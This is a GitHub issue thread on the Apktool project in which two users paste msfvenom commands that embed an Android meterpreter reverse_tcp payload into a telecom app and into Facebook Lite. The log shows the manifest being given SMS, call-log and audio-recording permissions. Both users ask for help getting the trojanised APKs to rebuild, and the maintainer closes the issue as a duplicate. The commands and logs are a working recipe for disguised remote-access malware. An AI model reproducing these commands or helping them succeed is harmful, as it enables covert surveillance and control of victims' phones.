### ISSUE TITLE
having issue with apk unable to rebuild apk

### ISSUE THREAD

**Issue by VENUROCKS** [iBotPeaches/Apktool#2176] opened 2019-09-20 03:57 UTC
### Information
1. **Apktool Version (`apktool -version`)** -2.4.0
2. **Operating System (Mac, Linux, Windows)** -KALI LINUX LARGE 64BIT
3. **APK From? (Playstore, ROM, Other)** -apkmonk.com

### Stacktrace/Logcat

```
Include stacktrace here
root@kali:~/Downloads# msfvenom -x myairtel.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.247 LPORT=4444 -o ma.apk
Using APK template: myairtel.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.myairtelapp.kuoen
[*] Loading /tmp/d20190920-6482-8wxiw8/original/smali_classes3/com/myairtelapp/global/App.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Rebuilding myairtel.apk with meterpreter injection as /tmp/d20190920-6482-8wxiw8/output.apk
[-] I: Using Apktool 2.4.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroid/support/v4/util/LongSparseArray;->clone()Landroid/support/v4/util/LongSparseArray;
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:917)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:341)
	at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:297)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
	at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
	at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:419)
	at brut.androlib.Androlib.buildSources(Androlib.java:350)
	at brut.androlib.Androlib.build(Androlib.java:302)
	at brut.androlib.Androlib.build(Androlib.java:269)
	at brut.apktool.Main.cmdBuild(Main.java:247)
	at brut.apktool.Main.main(Main.java:79)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x13
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1190)
	at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:913)
	... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65558
	at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
	at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
	at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1150)
	... 11 more

Error: Unable to rebuild apk with apktool

```

### Steps to Reproduce
1. `apktool `

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
If this APK can be freely shared, please upload/attach a link to it.
(https://www.apkmonk.com/app/com.myairtelapp/)

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything?yes
2. If you are trying to install a modified apk, did you resign it?yes
3. Are you using the latest apktool version?yes 2.4.0 only from ibotpeaches

**Comment by SATYADAHAL** [comment] 2019-10-03 05:22
msfvenom -x fb.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=444 -o /root/Desktop/Lite.apk
Using APK template: fb.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.sdrnq
[*] Loading /tmp/d20191006-3102-ers6yb/original/smali/com/facebook/lite/ClientApplicationSplittedShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Rebuilding fb.apk with meterpreter injection as /tmp/d20191006-3102-ers6yb/output.apk
[-] I: Using Apktool 2.3.4-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: aapt: brut.common.BrutException: 32 bit OS detected. No 32 bit binaries available. (defaulting to $PATH binary)
W: First type is not attr!
W: A/        ( 3319): First type is not attr!
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [aapt, p, --min-sdk-version, 15, --target-sdk-version, 28, --version-code, 173843583, --version-name, 165.0.0.5.120, --no-version-vectors, -F, /tmp/APKTOOL3991310619197288384.tmp, -0, xzs, -0, assets/secondary-program-dex-jars/secondary.dex.jar.xzs, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20191006-3102-ers6yb/original/res, -M, /tmp/d20191006-3102-ers6yb/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool


Any solution

**Comment by iBotPeaches** [comment] 2019-10-06 09:42
Closing as duplicate of https://github.com/iBotPeaches/Apktool/issues/2177

**Closed by iBotPeaches** 2019-10-06 09:42 UTC
